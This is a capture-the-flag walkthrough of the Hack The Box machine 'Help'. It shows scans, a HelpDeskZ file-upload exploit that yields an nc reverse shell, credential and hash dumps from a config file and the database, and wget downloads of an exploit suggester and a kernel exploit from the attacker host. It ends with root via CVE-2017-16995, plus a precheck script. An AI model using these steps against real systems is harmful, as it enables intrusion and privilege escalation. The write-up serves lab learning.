
Help

Machine Name | Level | OS
Help - HTB   | Easy  | Linux

Walkthrough

nmap scan:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I couldn't find anything on 3000, so I focused on 80. The gobuster scan gave the following results.


┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/Help]
└─# gobuster dir --add-slash --expanded --follow-redirect --url http://10.10.10.121/ --no-error -t 50 --extensions php,txt,html --wordlist /usr/share/wordlists/dirb/big.txt| tee gobuster3
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.121/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,txt,html
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2021/09/12 09:04:47 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.10.121/.htpasswd/           (Status: 403) [Size: 297]
http://10.10.10.121/.htpasswd.php        (Status: 403) [Size: 300]
http://10.10.10.121/.htpasswd.txt        (Status: 403) [Size: 300]
http://10.10.10.121/.htpasswd.html       (Status: 403) [Size: 301]
http://10.10.10.121/.htaccess/           (Status: 403) [Size: 297]
http://10.10.10.121/.htaccess.php        (Status: 403) [Size: 300]
http://10.10.10.121/.htaccess.txt        (Status: 403) [Size: 300]
http://10.10.10.121/.htaccess.html       (Status: 403) [Size: 301]
http://10.10.10.121/icons/               (Status: 403) [Size: 293]
http://10.10.10.121/index.html           (Status: 200) [Size: 11321]
http://10.10.10.121/javascript/          (Status: 403) [Size: 298]  
http://10.10.10.121/server-status/       (Status: 403) [Size: 301]  
http://10.10.10.121/support/             (Status: 200) [Size: 4453] 

An application called HelpDeskZ is running at http://10.10.10.121/support/. There are no default credentials, but there are published exploits for its version number.


┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/Help]
└─# searchsploit HelpDeskZ                        
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
HelpDeskZ 1.0.2 - Arbitrary File Upload                                                                                                                                                                     | php/webapps/40300.py
HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download                                                                                                                              | php/webapps/41200.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

In a second gobuster scan I found http://10.10.10.121/support/readme.htm, which states that the version is 1.0.2, so the exploits can be used; however, I could not get the unauthenticated file upload exploit to work at all. So I started researching online.

https://gist.githubusercontent.com/dasithsv/d2b0c8cea39096e19f336f5e29bbf803/raw/a6d24e637a9fb3dfb7c6d1598980af2594f6a168/HelpDeskZ 1.0.2 - Arbitrary File Upload.py

When I read the exploit at the address above, I saw that I had actually been using the existing exploit incorrectly. A file has to be uploaded to the system first: I uploaded my reverse shell through the ticket submission page at http://10.10.10.121/support/?v=submit_ticket&action=confirmation, and only then ran the exploit against the uploads directory.


┌──(root💀kali)-[/home/…/HTB/Linux/Help/exploit]
└─# python 40300.py http://10.10.10.121/support/uploads/tickets/ test.php                                      130 ⨯
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
1631455471

┌──(root💀kali)-[/home/…/HTB/Linux/Help/exploit]
└─# nc -lvp 1234                                                                                                 1 ⨯
listening on [any] 1234 ...
10.10.10.121: inverse host lookup failed: Unknown host
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.121] 38868
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 07:04:34 up 56 min,  0 users,  load average: 1.15, 1.27, 1.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$ 

And I got the reverse shell. Let's read the first flag.


help@help:/home$ cd help
help@help:/home/help$ ls
total 76
drwxr-xr-x   7 help help  4096 Jan 11  2019 .
drwxr-xr-x   3 root root  4096 Nov 27  2018 ..
-rw-rw-r--   1 help help   272 Jan 11  2019 .bash_history
-rw-r--r--   1 help help   220 Nov 27  2018 .bash_logout
-rw-r--r--   1 root root     1 Nov 27  2018 .bash_profile
-rw-r--r--   1 help help  3771 Nov 27  2018 .bashrc
drwx------   2 help help  4096 Nov 27  2018 .cache
drwxr-xr-x   4 help help  4096 Sep 12 06:08 .forever
-rw-------   1 help help   442 Nov 28  2018 .mysql_history
drwxrwxr-x   2 help help  4096 Nov 27  2018 .nano
drwxrwxr-x 290 help help 12288 Jan 11  2019 .npm
-rw-r--r--   1 help help   655 Nov 27  2018 .profile
-rw-rw-r--   1 help help    66 Nov 28  2018 .selected_editor
-rw-r--r--   1 help help     0 Nov 27  2018 .sudo_as_admin_successful
-rw-rw-r--   1 help help   225 Dec 11  2018 .wget-hsts
drwxrwxrwx   6 root root  4096 Jan 11  2019 help
-rw-rw-r--   1 help help   946 Nov 28  2018 npm-debug.log
-rw-r--r--   1 root root    33 Nov 28  2018 user.txt
help@help:/home/help$ cat user.txt
bb8a7b36bdce0c61ccebaa173ef946af

After that I enumerated the machine. Here are the results I found interesting.

help        685  0.0  0.2 947668  2992 ?        Ssl  06:08   0:00 /usr/bin/nodejs /usr/local/lib/node_modules/forever/bin/monitor /home/help/help/dist/bundle.js
help        695  0.7  3.7 990444 36928 ?        Sl   06:08   0:27  _ /usr/bin/nodejs /home/help/help/dist/bundle.js
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
help@help:/var/www/html/support$ find /var/www/html/support -name "*config*" 2>/dev/null
/var/www/html/support/includes/config.php
help@help:/var/www/html/support$ cat /var/www/html/support/includes/config.php
<?php
    $config['Database']['dbname'] = 'support';
    $config['Database']['tableprefix'] = '';
    $config['Database']['servername'] = 'localhost';
    $config['Database']['username'] = 'root';
    $config['Database']['password'] = 'helpme';
    $config['Database']['type'] = 'mysqli';
    ?>
help@help:/var/www/html/support$ 
mysql> select * from users;
select * from users;
+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+
| id | salutation | fullname | email                 | password                                 | timezone         | status |
+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+
|  1 |          0 | helpme   | [email protected]     | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian/Christmas |      1 |
|  2 |          0 | xcvxv    | [email protected] | ec09fa0d0ba74336ea7fe392869adb198242f15a | NULL             |      1 |
+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+
c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca:sha1:godhelpmeplz
[*] fst130 Does 'help' have mail?.......................................... yes!
-rw-rw---- 1 help mail 27501 Sep 12 08:35 /var/mail/help
var _user = { username: '[email protected]', password: '5d3c93182bb20f07b994a7f617e99cff' };

None of these worked, so I ran linux-exploit-suggester.

help@help:/tmp$ wget http://10.10.14.18/linux-exploit-suggester.sh
--2021-09-12 10:12:06--  http://10.10.14.18/linux-exploit-suggester.sh
Connecting to 10.10.14.18:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 88891 (87K) [text/x-sh]
Saving to: 'linux-exploit-suggester.sh'

linux-exploit-sugge 100%[===================>]  86.81K   466KB/s    in 0.2s    

2021-09-12 10:12:06 (466 KB/s) - 'linux-exploit-suggester.sh' saved [88891/88891]

help@help:/tmp$ chmod +x linux-exploit-suggester.sh
help@help:/tmp$ ./linux-exploit-suggester.sh

Available information:

Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

78 kernel space exploits
48 user space exploits

Possible Exploits:

cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: highly probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2017-7308] af_packet

   Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
   Exposure: probable
   Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels

[+] [CVE-2017-6074] dccp

   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: probable
   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2017-5899] s-nail-privget

   Details: https://www.openwall.com/lists/oss-security/2017/01/27/7
   Exposure: probable
   Tags: [ ubuntu=16.04 ],manjaro=16.10
   Download URL: https://www.openwall.com/lists/oss-security/2017/01/27/7/1
   ext-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh
   Comments: Distros use own versioning scheme. Manual verification needed.

[+] [CVE-2017-1000112] NETIF_F_UFO

   Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
   Exposure: probable
   Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
   Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels

[+] [CVE-2016-8655] chocobo_root

   Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
   Exposure: probable
   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
   Download URL: https://www.exploit-db.com/download/40871
   Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled

[+] [CVE-2016-4557] double-fdput()

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
   Exposure: probable
   Tags: [ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
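Before uploading and compiling a kernel exploit it is worth checking the conditions the suggester prints on its Comments line, since a mismatch costs time and a failed kernel exploit can panic the box. The script below is an added example, not part of the post or of linux-exploit-suggester: it reads kernel.unprivileged_bpf_disabled and the CONFIG_BPF_SYSCALL line of the kernel config, parses the release string the way the LES tags key on it (4.4.0-116-generic gives ABI number 116, to compare against the distro's security notice), and reports which condition fails. The file paths and function names are assumptions, and the checks take text rather than paths so they can be run against constructed input. One correction to the LES comment: on current kernels the sysctl can also be 2 (disabled), so the check requires the value 0 rather than "not 1".

```python
import os
import re
import shutil

SYSCTL_PATH = "/proc/sys/kernel/unprivileged_bpf_disabled"  # assumed default location


def parse_kernel_release(release):
    """'4.4.0-116-generic' -> (4, 4, 0, 116); the trailing number is the Ubuntu ABI the LES tags use."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(?:-(\d+))?", release)
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    return tuple(int(x) if x is not None else 0 for x in m.groups())


def unprivileged_bpf_allowed(sysctl_text):
    """Unprivileged bpf() is only usable when the sysctl reads 0 (1 and 2 both disable it)."""
    return sysctl_text.strip() == "0"


def bpf_syscall_enabled(config_text):
    """CONFIG_BPF_SYSCALL=y must be present in /boot/config-$(uname -r) (or a decompressed /proc/config.gz)."""
    return bool(re.search(r"^CONFIG_BPF_SYSCALL=y$", config_text, re.M))


def precheck(release, sysctl_text, config_text):
    """Return every condition separately plus an overall verdict, so the failing one is visible."""
    result = {
        "kernel": parse_kernel_release(release),
        "unprivileged_bpf": unprivileged_bpf_allowed(sysctl_text),
        "bpf_syscall": bpf_syscall_enabled(config_text),
    }
    result["worth_trying"] = result["unprivileged_bpf"] and result["bpf_syscall"]
    return result


def read_or_empty(path):
    """Missing or unreadable files count as a failed check rather than an exception."""
    try:
        with open(path) as fh:
            return fh.read()
    except OSError:
        return ""


if __name__ == "__main__":
    release = os.uname().release
    verdict = precheck(release, read_or_empty(SYSCTL_PATH), read_or_empty("/boot/config-" + release))
    verdict["gcc_on_target"] = shutil.which("gcc") is not None  # the post compiles on the box itself
    for key, value in verdict.items():
        print("%-18s %s" % (key, value))
```

If gcc is missing on the target, compile on a host with the same glibc major version and copy the binary over instead; a static build avoids that dependency at the cost of size.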

I went with the first suggestion, CVE-2017-16995 (eBPF verifier): I pulled the source onto the box, compiled it there with gcc, and ran it.

help@help:/tmp$ wget http://10.10.14.18/cve-2017-16995.c
--2021-09-12 10:57:57--  http://10.10.14.18/cve-2017-16995.c
Connecting to 10.10.14.18:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13728 (13K) [text/x-csrc]
Saving to: 'cve-2017-16995.c'

cve-2017-16995.c    100%[===================>]  13.41K  --.-KB/s    in 0.09s   

2021-09-12 10:57:57 (157 KB/s) - 'cve-2017-16995.c' saved [13728/13728]

help@help:/tmp$ gcc cve-2017-16995.c -o cve-2017-16995
help@help:/tmp$ ls
total 1040
drwxrwxrwt 10 root root   4096 Sep 12 10:58 .
drwxr-xr-x 22 root root   4096 Nov 28  2018 ..
drwxrwxrwt  2 root root   4096 Sep 12 06:08 .ICE-unix
drwxrwxrwt  2 root root   4096 Sep 12 06:08 .Test-unix
drwxrwxrwt  2 root root   4096 Sep 12 06:08 .X11-unix
drwxrwxrwt  2 root root   4096 Sep 12 06:08 .XIM-unix
drwxrwxrwt  2 root root   4096 Sep 12 06:08 .font-unix
drwxrwxrwt  2 root root   4096 Sep 12 06:08 VMwareDnD
-rwxrwxrwx  1 help help  18440 Sep 12 10:58 cve-2017-16995
-rw-rw-rw-  1 help help  13728 Sep 12 10:52 cve-2017-16995.c
-rwxrwxrwx  1 help help 452509 Aug 26 13:47 linpeas.sh
-rwxrwxrwx  1 help help  88891 Sep  8 14:58 linux-exploit-suggester.sh
-rwxrwxrwx  1 help help  41177 Sep  8 14:34 lse.sh
-rw-rw-rw-  1 help help 200427 Sep 12 07:12 result1
-rw-rw-rw-  1 help help 193317 Sep 12 08:36 result2
drwx------  3 root root   4096 Sep 12 06:08 systemd-private-f9459c97985149de9df4c8fd9c15df9e-systemd-timesyncd.service-Ka57wQ
drwx------  2 root root   4096 Sep 12 06:08 vmware-root
help@help:/tmp$ ./cve-2017-16995
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003af7ba00
[*] Leaking sock struct from ffff88001f403c00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003912bbc0
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88003912bbc0
[*] credentials patched, launching shell...
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare),1000(help)
# cd /root
# ls
root.txt
# cat root.txt
b7fe6082dcdf0c1b1e02ab0d9daddb98

Category: Walkthrough
